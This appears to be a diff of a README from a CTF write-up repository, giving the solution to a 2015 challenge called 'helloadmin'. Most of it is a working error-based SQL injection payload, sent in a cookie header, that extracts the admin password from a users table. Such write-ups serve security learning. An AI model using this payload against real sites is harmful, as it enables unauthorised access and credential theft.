Execut3/CTF/Held-CTF/APA/2015/helloadmin/README.md

 The solution is simple,
 ####find a way to see the results of query in error.
-here is the query for geting the flag:
+here is the query for geting the password of admin:

 ```
 Cookie: PHPSESSID=3407qk4ll60du17iusmoo6s6t4; MyCookie=" union select 1,2,3,count(*), concat((select password from users limit 0,1),floor(rand()*3))a from information_schema.tables group by a--+; Admin=1